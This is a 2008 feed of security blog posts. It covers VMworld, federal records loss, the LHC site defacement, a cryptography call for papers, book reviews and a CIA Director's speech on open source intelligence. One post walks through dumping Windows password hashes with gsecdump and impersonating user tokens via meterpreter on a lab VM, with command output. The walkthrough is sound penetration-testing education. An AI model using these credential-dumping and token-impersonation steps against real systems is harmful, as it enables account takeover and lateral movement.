Sunday, September 14, 2008

Spliced feed for Security Bloggers Network

Spliced feed for Security Bloggers Network

Bypassing ASP.NET “ValidateRequest” for Script Injection Attacks [Security Circus]

Posted: 14 Sep 2008 04:05 AM CDT

Travel: Off to VMworld 2008 in Vegas [Rational Survivability]

Posted: 13 Sep 2008 06:54 PM CDT

Vmworld 


This coming week I'm off to VMworld in Las Vegas for a week of virtual immersion.

I'm looking forward to meeting with fellow practitioners, analysts, folks from VMware, Microsoft, Citrix and vendors as well as attending many of the sessions and labs.

There are several meet-ups including community get-togethers, so if you're in town, ping me and let's get together and exchange ideas.

There's a bunch of anticipated high-profile announcements and I hope some of them pan out.  I'll be live-blogging/tweeting (beaker) as much as possible from the show.

See you there.

/Hoff

Losing our History [Security For All]

Posted: 13 Sep 2008 04:01 PM CDT


My wife and I spent the Independence Day weekend this year in Washington DC. In addition to watching the fireworks from the base of the Iwo Jima memorial we visited a number of other memorials and museums. But probably the most amazing place we visited was the National Archives. Aside from the U.S. Constitution and Declaration of Independence, the National Archives is in fact an archive of the U.S. government’s correspondent, business and legal transactions some of which are on exhibit. These exhibits include excerpts from the infamous Nixon Watergate tapes to (my person favorite) a letter from a 10-year-old Fidel Castro to President Franklin D. Roosevelt dated November 6, 1940, asking for a “ten dollar bill green American” (maybe Roosevelt should have sent him the 10 bucks - you never know). The fact is that the National Archive is a repository of everything the U.S. Government is involved in. Everything. The good, the bad, the ugly. The greatest achievements, the finest moments and the things we would like to forget. Especially the things we’d like to forget. This is everything from the most visible, substantial and important documents like the U.S. Constitution to mundane interoffice correspondence, which can in the long run be just as important historically.

You might think that the digital age has made the job of the National Archives quite a bit easier. Unfortunately nothing could be further from the truth as this article from the New York Times points out.

Countless federal records are being lost to posterity because federal employees, grappling with a staggering growth in electronic records, do not regularly preserve the documents they create on government computers, send by e-mail and post on the Web. Federal agencies have rushed to embrace the Internet and new information technology, but their record-keeping efforts lag far behind.

Moreover, federal investigators have found widespread violations of federal record-keeping requirements. Many federal officials admit to a haphazard approach to preserving e-mail and other electronic records of their work. Indeed, many say they are unsure what materials they are supposed to preserve.

This confusion is causing alarm among historians, archivists, librarians, Congressional investigators and watchdog groups that want to trace the decision-making process and hold federal officials accountable. With the imminent change in administrations, the concern about lost records has become more acute.

While those conspiracy theory fans among us (okay, I admit it - but the truth is out there) prefer a more tantalizing threat like a shadowy cabal that secretly removes and suppresses information embarrassing or threatening to their members, the reality is much more mundane - and insidious. And it’s a whole lot harder to address.

"The Achilles' heel of record-keeping is people," said Jason R. Baron, the director of litigation at the National Archives. "We used to have secretaries. Now each of us with a desktop computer is his or her own record-keeper. That creates some very difficult problems."

That’s right - it’s those pesky end users. You know, those regular folks who are just trying to get their job done as efficiently as possible. Yeah, those people who we never have the time or budget to provide with decent hardware and software. And forget about education (no money for that in this year’s budget). Oh, and the folks who actually control the purse strings don’t have “keep a public record of the stupid things we do” at the top of their must-fund list. (Yes! I knew I could slide a conspiracy theory in there).

All this is really patriotic, and sufficiently alarmist to get some good hits on Google, but what does it have to do with security, Mr. Security For All?

Actually - everything. Remember the CIA triad: Confidentiality, Integrity and Availability. This issue is fundamental to both Integrity and Availability. From Wikipedia:

  • Integrity - In information security, integrity means that data cannot be modified without authorization. Integrity is violated when an employee (accidentally or with malicious intent) deletes important data files.
  • Availability - For any information system to serve its purpose, the information must be available when it is needed. This means that the computing systems used to store and process the information, the security controls used to protect it, and the communication channels used to access it must be functioning correctly.

I think we can all agree that not saving important information through neglect is the same thing as deleting important data. And when future generations - or a researcher today - can’t get access to an email that is germane to their research because it was never saved violates availability.

So how do we go about mitigating this threat? There is already a program in progress to bring the National Archives more fully into the 21st century, but it is not without it’s all too typical problems.

The National Archives is in the early stages of creating a permanent electronic record-keeping system, seeking help from the San Diego Supercomputer Center at the University of California, and from some of the nation's best computer scientists.

The electronic archive is behind schedule and over budget. But officials say they hope that the project, being developed with Lockheed Martin, will be able to take in huge quantities of White House records when President Bush leaves office in January.

As a point of reference 32 million White House e-mail messages were preserved as records of the Clinton administration. The National Archives expects to receive hundreds of millions from the Bush White House. And since disputes over White House records have occurred at the end of the last three administrations, we can count on more litigation in January.

So here’s a bold idea: why not take the money that will be flushed down the litigation rat hole and put it towards the electronic record-keeping system? Oh, but wait, that would mean that politicians would have to be subject to the same laws, standards and directives that all government employees are. Or maybe Lockheed Martin could get some help from the IBM Almaden research guys on storing, indexing and accessing insane amounts of information since the Webfountain project went dark. Or underground. (Yes! another conspiracy theory reference).

In any case this is a risk that must be managed - and soon - before we lose what amounts to our civic cultural heritage.

SFO Network Administrator Debacle Still Evident [Infosecurity.US]

Posted: 13 Sep 2008 01:53 PM CDT

NetworkWorld’s Robert McMillan reports issues revolving around, and from, the dispute between the City of San Francisco and it’s former network administrator - Terry Childs -  (now rogue, and incarcerated) are still evident.

Quite frankly, regardless of the vagaries (both tawdry, sundry, and soap opera like) of this case, the fact that the CCSFO Contractors and CCSFO DTIS admins are STILL SEARCHING for devices (after more than 60 Days) is outrageous and indicative of the talent being brought to bear on this issue. The citizens of one of the most technologically advanced (from the perspective of networking) cities in the United States deserve better.

[1] NetworkWorld: San Francisco Hunts For Mystery Device On City Network

[2] NetworkWorld: Rogue Network Administrator Hijack

Have an iPhone? All Use Captured In Screenshots. Automagically. [Infosecurity.US]

Posted: 13 Sep 2008 01:48 PM CDT

Wired’s GadgetLab blogger Brian X. Chen reports a new (and a potential windfall for forensic research) functionality of Apple’s (NasdaqGS: APPL) iPhone smartphone.

Evidently, during a blogcast, forensics specialist Jonathan Zdziarski divulged the capability of the device to cache a copy of the latest screen activity. Apparently, this functionality is intended for the purpose of supporting the aesthetics of the product.

From the post: “…This is purely for aesthetic purposes: When an iPhone user taps the Home button, the window of the application you have open shrinks and disappears. In order to create that shrinking effect, the iPhone snaps a screenshot, Zdziarski said…”

Criminals Attack Large Hadron Collider Website [Infosecurity.US]

Posted: 13 Sep 2008 01:38 PM CDT

The Telegraph UK’s, Roger Highfield [Science Editor] reports criminal hackers, apparently based in Greece, have defaced the Large Hadron Collider website in Switzerland. Scientists at CERN also speculated on the possibility of the hack attempts leading to a shutdown of the facility.

From The Telegraph: {Now it has emerged that, as the first particles were circulating in the machine near Geneva, a Greek group had hacked into the facility and displayed a page with the headline “GST: Greek Security Team.”
The people responsible signed off: “We are 2600 - dont mess with us. (sic)”
The website - cmsmon.cern.ch - can no longer be accessed by the public as a result of the attack…
If they had hacked into a second computer network, they could have turned off parts of the vast detector and, said the insider, “it is hard enough to make these things work if no one is messing with it.”
}

12th IACR International Workshop on Practice and Theory in Public Key Cryptography [Infosecurity.US]

Posted: 13 Sep 2008 12:44 PM CDT

The IACR has issued a call for papers for the 12th IACR International Workshop on Practice & Theory in Public Key Cryptography 2009.

(Note: Infosecurity.US is a member of the IACR).

The full Call for Papers Notification appears after the jump.

12th IACR International Workshop on Practice and
Theory in Public Key Cryptography (PKC) 2009

March 18-20, 2009, Irvine, CA, USA

DEADLINES:
———-
Submission:     Sept. 24, 11:59pm PST, 2008
Notification:   Nov. 25, 2008
Camera-Ready:   Dec. 20, 2008

GENERAL INFORMATION:
——————–
Original research papers on all technical aspects of public
key cryptography are solicited for submission to PKC 2009, the
12-th  International Workshop on Practice and Theory in Public
Key Cryptography.

SUBMISSION INSTRUCTIONS:
————————
Submissions must not substantially duplicate work that any
author has published in a journal or a conference/workshop
with proceedings, or has submitted (or is planning to submit) before
the author notification deadline to other conferences/workshops
that have proceedings. Parallel submissions will be immediately
rejected and the names of the authors involved will be shared
with other conference in the field.

Each submission must be:

* At most 14 pages, not including references and appendices,
in 11pt font and with reasonable margins.

* Intelligible and self-contained without appendices
(reviewers are not required to read them).

* Anonymous: no author names, affiliations, acknowledgments,
or obvious references.

Submissions not meeting these criteria will be rejected.

If a submission is accepted, one of the authors is expected to
present the paper at the workshop.  Further submission instructions
will be posted on the conference home page:
http://www.iacr.org/workshops/pkc2009

PROCEEDINGS:
————————
PKC’09 proceedings will be published in Sprinter-Verlag LNCS Series
and will be available at the conference.

ORGANIZATION:
————-
Conference Co-Chairs:   Stanislaw Jarecki and Gene Tsudik, UC Irvine, USA
Contact email:          pkc09 [AT] ics.uci.edu

US-CERT: Reports of DHS Email Spam [Infosecurity.US]

Posted: 13 Sep 2008 12:43 PM CDT

US-CERT has released a notification specifying a new spam attack using Department of Homeland Security addresses.

From the announcement: “…spam email messages are being sent that appear to come from high-level DHS officials, some of which attempt to entice the user into an advance fee fraud scam. In some cases, the sender’s address has been spoofed so that the email appears to come from a legitimate dhs.gov address….”

Playing with Live Streams for SRT [Network Security Blog]

Posted: 13 Sep 2008 08:07 AM CDT

This morning Michael Santarcangelo and I will be playing with streaming the audio from an Security Roundtable podcast.  We don’t really have a topic or a theme for the podcast.  We don’t even have any stories to talk about.  We’ll just be sitting online, talking and testing out how to use the streaming software.  And let me tell you, this software has more options and tricks than I’ll use in a long, long time.

The stream will start at 7:00 am PDT at http://hak5radio.com:8000/SRT.mp3.m3u  I think.  I may have the URL munged up a little, so if that doesn’t work, try it with just the .mp3 extension. We have a guest lined up thanks to a tweet last night, but this really is just going to be 3 security guys talking about whatever interests them for about 45 minutes. 

If this works out, Rich and I may try streaming the Network Security Podcast when we record.  We can’t do anything as organized as actually have a set time and date for our recording sessions, but this will be one step closer to being able to do so. 

PS.  I created a channel for today’s session on IRC.freenode.net.  Predictably, the channel name is ##SRT. 

[Slashdot] [Digg] [Reddit] [del.icio.us] [Facebook] [Technorati] [Google] [StumbleUpon]

Hackers attack Large Hadron Collider [Security Circus]

Posted: 13 Sep 2008 08:00 AM CDT

United 'bankruptcy' points to new stock scam techniques [Security Circus]

Posted: 13 Sep 2008 07:57 AM CDT

Large Hadron Collider - LHC Livecam [Security Circus]

Posted: 13 Sep 2008 07:50 AM CDT

"Apple views tennis-shoe DRM as a way to head off what it sees as a potential ..." [Security Circus]

Posted: 13 Sep 2008 07:24 AM CDT

Apple views tennis-shoe DRM as a way to head off what it sees as a potential plague of sneaker hacking. "Some people," the patent application observes, "have taken it upon themselves to remove the sensor from the special pocket of the [iPod-linked] Nike+ shoe and place it at inappropriate locations (shoelaces, for example) or place it on non-Nike+ model shoes." Oh my God: Geeks are ripping the sensors out of their sneakers and sticking them on their shoelaces! Unleash the shoe nazis! It used to be cool to be an Apple fanboy. Now it's starting to be embarrassing. –Apple declares war on sneaker hackers

International Data Privacy Laws by Country [Security Circus]

Posted: 13 Sep 2008 04:26 AM CDT

UCSB Security Group's Attack on Voting Machines (Part 2 of 2) [Security Circus]

Posted: 13 Sep 2008 04:24 AM CDT

UCSB Security Group's Attack on Voting Machines (Part 2 of 2)

UCSB Security Group's Attack on Voting Machines (Part 1 of 2) [Security Circus]

Posted: 13 Sep 2008 04:24 AM CDT

UCSB Security Group's Attack on Voting Machines (Part 1 of 2)

(Image) [Security Circus]

Posted: 13 Sep 2008 04:13 AM CDT

5500_4bee_400

This posting includes an audio/video/photo media file: Download Now

via ThreatExpert [Security Circus]

Posted: 13 Sep 2008 04:08 AM CDT

9804_bdf7_400

via ThreatExpert

Reposted from codec via sid77

This posting includes an audio/video/photo media file: Download Now

"Sabina Guzzanti, known for her take-offs of the prime minister, Silvio Berlus..." [Security Circus]

Posted: 13 Sep 2008 04:02 AM CDT

Sabina Guzzanti, known for her take-offs of the prime minister, Silvio Berlusconi, risks being jailed for up to five years. The prosecutors recommended to the justice ministry that she be indicted because of a speech she made to a leftwing rally in July. Referring to the attitude to gay people of the Catholic church and Pope Benedict - the former cardinal Joseph Ratzinger - Guzzanti said: "In 20 years Ratzinger will be dead and will end up in hell, tormented by queer demons - not passive ones, but very active ones." –Comedian who satirised Pope could face prosecution | World news | The Guardian
Reposted from sid77

(Image) [Security Circus]

Posted: 13 Sep 2008 04:00 AM CDT

5483_02ff_400

This posting includes an audio/video/photo media file: Download Now

(Image) [Security Circus]

Posted: 13 Sep 2008 04:00 AM CDT

5480_7445_400

This posting includes an audio/video/photo media file: Download Now

(Image) [Security Circus]

Posted: 13 Sep 2008 03:58 AM CDT

5464_bc88_400

This posting includes an audio/video/photo media file: Download Now

passing the hash with gsecdump and msvctl (yes more) [Carnal0wnage Blog]

Posted: 12 Sep 2008 08:59 PM CDT

So just a follow up post on gsecdump and msvctl after doing prep for post exploitation topics for the toorcon workshop.

For some reason I thought that gsecdump would not require admin privileges, this is incorrect it will require admin or system on the box. What it doesn't require is injecting into lsass to get the hashes (at least according to here).

"Most notable features are extracting password hashes for active logon sessions, LSA secrets without injecting into lsass.exe making it safe to run on any system and pwdump functionality without DLL injection (and a lot more stable). Gsecdump has no DLL dependency making it very easy to use on remote systems with psexec. If it for some reason can't do what it is supposed to, try running it as SYSTEM and you should get your info."

OK, so you still need admin or higher but the cool thing (and I have already covered this) is that it dumps the hashes for active logon sessions. Now, the key to to that is active logon sessions. So if you are userland and admin or higher then you might be stuck with that user's hash because once the log out the active logon session hash seems to disappear (sometimes ??) but if you get a system shell you might get some of the old logged in users.

example:
#popped a system shell and got a command shell with meterpreter

C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

#logged into the box as nobody

C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
XPSP1VM\nobody::e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Logged out as nobody
C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Once nobody logs out, things were back to where they were. This is an important distinction between gsecdump/msvctl and token stealing. But, once you have a hash, any user can use that hash where you have to be admin/system to pass tokens.

Let's see the same scenario with incognito

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

#login as nobody
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
XPSP1VM\nobody

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

#log out as nobody
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
XPSP1VM\nobody

meterpreter > impersonate_token XPSP1VM\\nobody
[-] No delegation token available
[+] Successfully impersonated user XPSP1VM\nobody
meterpreter > getuid
Server username: XPSP1VM\nobody
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Lastly, like I already mentioned in the other msvctl post, you have to actually be sitting on the box to get your new shell with the user's creds you passed because it pops up a whole new command shell. Which is kind of a bummer, with a remote shell. You'll have to use the pass the hash toolkit instead.

Some other reading on gsecdump and msvctl
http://blogs.pointbridge.com/Blogs/seaman_derek/Pages/Post.aspx?_ID=20
http://ciac.llnl.gov/ciac/techbull/CIACTech08-002.shtml

http://truesecurity.se/blogs/murray/archive/2007/06/08/my-sec-310-sesson-on-teched-us-2007-is-now-available-as-a-webcast.aspx

Also I was doing some googling on pass the hash and came across this post in reference to the pass the hash problem, best part in bold.

http://www.eggheadcafe.com/software/aspnet/30890366/hash-injection-mitigation.aspx
best quote:

"Hash injection mitigation? - Steve Riley [MSFT] <06-oct-07 style="font-weight: bold;">In either case, you need to become admin of the computer before you can force the compromised machine to release its hashes from memory, which lessens the likelihood of success. And if you did manage to become admin, there are fare more interesting attacks that you'd want to attempt. By the way, sniffing a network connection won't reveal hashes. In other words, there's nothing new here, and very little that you need to worry about."

I don't know, going from a local admin on a box to domain admin is pretty interesting to me...

Book Review: Understanding UNIX/Linux Programming [Reflections on Security]

Posted: 12 Sep 2008 07:59 PM CDT

I've posted a review of Understanding UNIX/LINUX Programming: A Guide to Theory and Practice by Bruce Molay on Amazon. While not a security topic per se, a solid grounding in systems programming is a prerequisite for vulnerability researchers and other technically oriented security professionals. Arguably, there is no better introduction to the subject than this book.

Book Review: Against The Gods - The Remarkable Story Of Risk [Reflections on Security]

Posted: 12 Sep 2008 07:42 PM CDT

To many practitioners, information security is a form of risk management. Since it is impossible to protect a complex system against all conceivable security threats, an approach based on the assessment of risk is employed to distinguish between the threats that are worth worrying about and those that aren't. But what exactly does the concept of risk represent? How does one measure (never mind control) risk? This is an age-old problem mankind has been struggling with for centuries.

Against the Gods: The Remarkable Story of Risk is a historical overview of the advances made in the struggle to measure and control uncertainty. While the author's viewpoint is primarily from the perspective of risk to investments made on the stock market, the lessons learned are of value to security professionals as well. Contrasted with the sophisticated methods employed by financial institutions controlling their exposure to the unpredictable ups and downs of the global economy, the risk management methods currently available to security managers seem crude and laughable in comparison. If we are to make any headway in the battle against identity theft, data breaches, malware, and all the other information security woes that currently plague us, we need better risk management tools, so that our limited security budgets can be spent more effectively.

DNI Open Source Conference 2008 - Remarks From CIA Director [Infosecurity.US]

Posted: 12 Sep 2008 05:55 PM CDT

The Office of the Director of National Intelligence (ODNI) has released the following transcript, detailing the remarks and question & answer session during Day 2 (yesterday, September 12th, 2008)  ODNI Open Source Conference in Washington, D.C.

Without further ado, we are publishing this fascinating transcript after the break.

Remarks and Q&A by the Director of the Central Intelligence Agency
Michael V. Hayden
DNI Open Source Conference 2008
Washington, DC
September 12, 2008
MR. DOUG NAQUIN (Director, Open Source Center):  Good morning, again.

To recall yesterday afternoon's community panel session, I noted that as we developed our capabilities over the past few years, both in the Open Source Center and in the community writ large, we needed to secure a voice at the proverbial table or tables so we could begin to have those conversations that would institutionalize open source as a recognized program as well as, as a discipline.

One person who has been instrumental in getting open source a voice at those tables is our next speaker:  first, as Principal Deputy Director of National Intelligence under our first DNI, John Negroponte; and now as Director of the Central Intelligence Agency.

Michael V. Hayden has insured the Intelligence Community does not lose sight of an environment that we've seen over these two days is growing and morphing continuously in terms of its potential to improve our knowledge of and insight into the world in which we operate.  As much as anyone, Director Hayden has taken the community from acknowledging open source is good to actionable footing.

As a former military attaché in J-2, he is deeply familiar with the value of open source on the ground, and as a former Director of the National Security Agency, he is certainly no stranger to the challenge of volume.

So without further ado, it is my distinct pleasure to introduce Mr. Michael V. Hayden, Director of the Central Intelligence Agency.

(Applause.)

DIRECTOR MICHAEL V. HAYDEN (Director, CIA):  Well, thanks, Doug.  Good morning, everyone.  It's a pleasure to be here.  You get 39 years of being only to wear a blue tie, and you see what happens, huh?  (Laughter.)

As Doug suggested, I'm no stranger to the open source discipline and actually quite a fan of it.  As you mentioned, I'm a career intelligence officer, so I'd like to start today with maybe an observation that could surprise some of you.  Secret information isn't always the brass ring in our profession.  In fact, there's real satisfaction in solving a problem or answering a tough question with information that someone was dumb enough to leave out in the open.  (Chuckles.)

Doug mentioned I was an attaché in Bulgaria – a long time ago, about 20 years now.  Part of that job is immersing yourself in that society.  Someone once gave me – the description of a good attaché is someone who has become so immersed in the society that when he wakes up in the morning, he can sense that something is different today.  So in order to be able to do that, in order to immerse yourself, you read the press even if it's the state-run press, you watch television even if it's state-run news shows.  You make all kinds of official contacts that you can possibly make.  Most of that stuff is a little dry, but in essence it gave me a sense for norm; you know, it gave you a sense as to what the center line was.

Now there was a lot of information there, always freely available, and I collected it in open and sometimes not-so-open ways.  But the key was to actually know what to look for and then be in a position to absorb it.

One of the things I did as an attaché – and I realize this is a little bit different than maybe the narrowly defined definition of open source, but I think it has powerful echoes, so I want to share it with you.  As an attaché, you are an overt collector.  And this was a communist country, a closed state in which attaches were fairly closely watched.  But again, you wanted to immerse yourself in that society to learn as much about it as you possibly could.

So one of the things I took to doing is, rather than driving on collection trips in the U.S. government Volvo that we had, I took to taking trains.  And so I would get up early in the morning, try to slip out of the house without being observed.  I'd take the streetcar down to the train station, buy the ticket that day, get on the train, and then travel across Bulgaria from Sofia to the Black Sea, and then turn around and come back.

Now, that was an attractive route for me because one of the more important things I had to observe was Bulgaria's armored brigades, of which there were five.  And many of you probably know tanks are heavy, and they like to move them by rail.  So guess where all five tank brigades were.  They were all along the main east-west rail lines.

So I would go into the car and immediately go to the dining car and figure out some way that I could stay there beyond the 45-minute limit that was posted at both ends of the car; not because the Bulgarian breakfast food was particularly attractive – (laughter) – but because the dining car had windows on both sides, and that I could observe both sides as we traveled out.

So we get to Varna or Burgas – okay – and my goal there was to be – if I could possibly be invisible, I would have been, but I can't, so I just try to keep my mouth shut, speak as little Bulgarian as I could – ordering things and so on – and, again, trying to be as inconspicuous as possible.

But on the return trip, I change the M.O.  On the return trip, I'd done all my observation.  On the return trip, I wanted to – back to that verb I used earlier – absorb, but this time I was going to absorb not visually, but socially, and so I would walk the length of the car – multiple cars – looking for that couchette that had the empty seat with seemingly interesting people in all of the other seats.

I can recall one instance where I was walking by a couchette with six seats – five full, one empty.  The five individuals in the seats were Bulgarian air force academy cadets – (laughter) – and I just looked at the seat and said – (in Bulgarian) – is it free?  Da.  Got away with that without too much of an accent, sat down, pulled my hat down over my eyes, closed my eyes and just sat there.

They were practicing their aviation English.  Now the international language of aviation is English, and so if you want to be an aviator, you've got to – you know, you've got to have some working knowledge of English.  And so they would be saying some things in Bulgarian and coming back in English or saying some things in English and coming back in Bulgarian.  And one of the phrases – one of the phrases they put out was "runway."  And there was a long pause because whoever they were asking this of didn't know the answer.  So from the – beneath the brim of my hat, this voice – mine – simply said, pista (ph) – (chuckles) – which is the Bulgarian word for runway or racetrack and so on.

And it was one of those Rod Serling kind of moments for those poor cadets.  (Laughter.)  I identified who I was, so as not to make them vulnerable or at least not to do something they weren't prepared to – well, only volunteered to do, talk to an American.  One of them vaporized in an instant.  He was gone from the car and I never saw him again.  (Laughter.)  But the other four stayed there and we spent the rest of the time going into Sofia just talking about life and death and military service and how's the academy and what's your curriculum and what do you intend to fly and how long – how many flight hours do you get?  (Laughter.)  What's the saddle depth of an SS-21?  (Laughter.)

I was doing, back in the mid 1980s, socially, absorbing information that wasn't, in any real sense, protected, information that was available, would we but get ourselves up against it and be able to, again, use that verb, absorb it.  In today's world, that information that would have been available 20, 22 years ago, only by this social discourse, is now available in what we call open source, out there in the electronic media in which our species has decided to put almost all known knowledge.  And so that experience as an attaché has given me an appreciation of that which we can learn, information readily available, unguarded, not classified, if we would but get ourselves in a position to access it.

I should also add too that those five armor brigades that I wanted to look at from Kniajevo and Sliven and Yambol and Kazalak, okay, they were actually pretty big.  They were actually pretty easy to see.  Today, the job we have in the Intelligence Community is a lot harder and bit different.  The things we want to discover are not out there as the size of an armor brigade.  Collection, analysis, dissemination of information is as important as it has ever been.  And so your conference here, covering such a broad array of topics including – and I'm happy to see virtually every stakeholder in the open source enterprise here – makes abundantly clear that the rich potential, far reach, and real impact of open source intelligence has finally been embraced.

Now, it's something I appreciated even before that tour in Bulgaria and I've tried to carry it forth ever since.  A little over three years ago, as Doug suggested, a small group of us sat down to figure out what the new Intelligence Community might look at under the newly created Director of National Intelligence John Negroponte.  John was at the DNI and I was his deputy.  We set up a shop just a few blocks from here in the Old Executive Office Building and literally taped blank sheets of butcher paper all along the wall of the temporary office we had been given.  And I mean – you know, we used the pages, blank as a metaphor.  This was not a metaphor – (chuckles) – okay?  The pages were blank.  And how did we want to structure this community?

There's a lot to think through.  But it didn't take us long to identify the way ahead for open source.  In fact, we saw the establishment of this center, the Open Source Center, as one of the three most important objectives for the ODNI in its first year.  The other two?  The National Clandestine Service at CIA, second, the National Security Branch at FBI, and, third, a more autonomous Open Source Center for the Intelligence Community.  We considered a couple of options for creating this center.  But at the end of the day, we decided that voting on the expertise and the capacities of the Foreign Broadcast Information Service and placing the center in CIA made the most sense.  FBIS represented the strongest foundation on which we could build, with capabilities that were already out there, ranging from media and Internet collection to research and analysis to advanced I.T., database acquisition and training.  And keeping it in CIA allowed the Open Source Center to focus on mission while CIA handled most of the housekeeping chores that would come about from any such organization.

So the aim from the start has been to build and strengthen those capabilities that already existed and then extend their reach.  And as I said, we made the Director of CIA the executive agent for open source.  I'd be responsible for the center's success, not just in such traditional roles as collector and analyzer and disseminator, but in a new, broader role of community leader working to expand the open source discipline.  Let me make sure we understand that distinction.  The Open Source Center was designed to be a production line in terms of the creation of knowledge of use to American policy-makers.  But it was also designed to be an advocate, a spokesman, a facilitator for the open source enterprise for the open source discipline beyond the fence line, beyond the confines of the Open Source Center itself.

I don't offer this bit of history as some sort of a lesson in the IC wiring diagram.  I want you simply to recognize that open source intelligence is widely seen as both an essential capability and a formal asset in our national security infrastructure.  As the DNI's strategic plan puts it, and I'm quoting here now, "No aspect of collection requires greater consideration or holds more promise than open source."  Here's why.  Those working in this discipline are at the nexus, right now, of two intensely powerful dynamic forces: the media and information technology.

And while the Internet has revolutionized human interaction, there is still an awful lot for us to learn about it and the opportunity that it now represents.  Finally, the questions our customers ask, whether it's a policy-maker or military commander or law-enforcement official demand answers, many of which are only available through open source research.

So when I became Director of CIA, one of the first things I did was to make Doug a direct report to me.  So Doug, in the org chart, is up there with the DI and the head of the National Clandestine Service, the Director of Support, and the Director of Science and Technology.  And early in my tenure I think Steve Kappes and I – Steve is the Deputy – had gone a bit public with the number of installations, the number of partners we visited.  Steve and I have been to more than 50 liaison partners in about a two-year time period.

In addition to that, we made a special effort to visit the outposts in the open source enterprise as well, and I think I've got four of those already in terms of notches on my belt.  One stop that meant a great deal to me was designed to be a courtesy call.  I was in Key West, not on business.  (Chuckles.)  And there is an open source facility there that looks at that island about 90 miles just off the southern marker buoy there.

It was going to be a 20-minute courtesy call.  I was there for three hours because, talk about time on target, the people in this little cinderblock shack on the extreme southern reaches of Key West knew so much about what was happening in Cuba.  And for me as the Director of CIA to sit with them and watch Cuban soap operas and have them tell me what they were extracting from watching these soap operas was quite remarkable.

They gave me a videotape, DVD, of a program that they had captured from the Internet.  And it had a Cuban soap-opera star starring in it, and there are only two other players.  And his name is Nicanor (sp) and he's making a fine brew of coffee and there's a knock at his door.  And it's two individuals from the security service to install the microphones.  (Laughter.)

We're here to install the microphones.  He says, what do you mean, microphones?  And it goes for about 17 minutes of some of the most subtle satiric commentary on a totalitarian state I have ever seen.  He mentions that – they have to decide where to put the microphones and they can't put them in the kitchen because it's too noisy and the bedroom air conditioner interferes with it.  So, finally, they say, we have to put the microphones in the bathroom.  (Laughter.)

So he says, when I criticize the government, I must go into the bathroom?  (Laughter.)  And he said, why don't we put another microphone over here?  And then they begin to criticize him.  What kind of person are you?  There are only a limited number of microphones in Cuba!  (Laughter.)  There's a family down the street that criticizes the government day and night.  They have 11 kids and they're only allotted one microphone.

It gave me a new appreciation for life and thought and the situation on the island.  And, again, back to riding trains to Kazanlak, it's out there; it's available, but you have to access.  And you access that truth in a way that's different from running agents against a foreign government.  Now, given that importance to this discipline, Doug sits at my staff meetings each time they occur, and that's three days a week.  Open source has a seat at the table, a seat at the table with every other core discipline that comprises the Central Intelligence Agency.  We think it's a key component of our own strategic blueprint, which we call our strategic intent; that's how important we think this is.

Now, as I indicated a few minutes ago, my job as executive agent for the Open Source Center is to help it achieve those two primary goals: one, a highly effective collector and producer in its own right, the production line; and, second, to be a catalyst for the larger community, for the open source enterprise about which you heard Doug talk about yesterday.

So how are we doing?  Well, one irony of working the open source side of the intelligence business, not unlike every other part of the intelligence business, is that the better we do, the less we can talk about it.  We are often addressing requirements or questions that are sensitive by nature.  The information is unclassified, our interest in it is not.

Open source, by the way, is now routinely packaged with the other ints in making our products out of our DI.  And I can assure you that on a recurring basis, you see open source material – cited as open source – in items in the President's Daily Brief.  It's also true that, from time to time, there are items in the President's Daily Brief that are exclusively derived from open source and carry the logo not of DIA or NSA or CIA, but carry the logo to the President of the Open Source Center.

It contributes open source intelligence to national security in unique and valuable ways.  Take recent events – take this jump-ball, Russia-Georgia and now think about how open source could contribute to that.  How about what's going on in Pakistan?  Think how open source can contribute to that and I think you have a pretty good idea of the kinds of things that open source can offer all of us.  It's invaluable.  We couldn't claim to do all-source analysis.

How can you be all-source, which is what we claim to be, if Doug and his folks are not part of our team?  And that's a baseline that helps us to find, by the way, what's truly secret, what is not accessible in these ways, and allows us better to focus our espionage energy on those things.

Open source also helps us understand how others view the world.  Without that understanding, we'd fail in our obligation to provide insight, not just information, but insight.  Last spring, I was out at the Kansas State University as part of their Landon Lecture Series.  And one of the points I wanted the students to take away from my time with them was how crucial it was for us as a nation to understand others, to understand others' viewpoints, friends and adversaries.  We can't be myopic, see things only through an American lens.  It's arrogant, but it's worse than arrogant; it's dangerous.  The lecture out at Kansas State focused on the growing complexity of the world and the fact that international relations in this century will be shaped by a greater number and more diverse set of actors than they were in the last century.  And the overriding challenges presented to those of us responsible for national security is that we now must do a far better job understanding cultures, histories, religions, and traditions that are not our own, or at least are not as represented even in our immigrant nation as much as our traditional cultures have been.

Open source officers have an important role in giving us that window.  They expose us to perspectives we might not otherwise see.  They broaden our understanding of the world.  That's fundamental to our mission.  Now, let me talk for a minute about goal number two, you know, the advocate, the sponsor, the facilitator, the responsibility to lead the community in unleashing the full potential of open source.

We can be proud.  We've made progress here as well.  Some examples – Open Source Center now provides the White House Situation Room with 340 real-time feeds from televisions broadcasts around the world.  It provides data that highlights to our commands like EUCOM through a customized Internet portal.  It's formed new collaborative relationships with foreign partners.

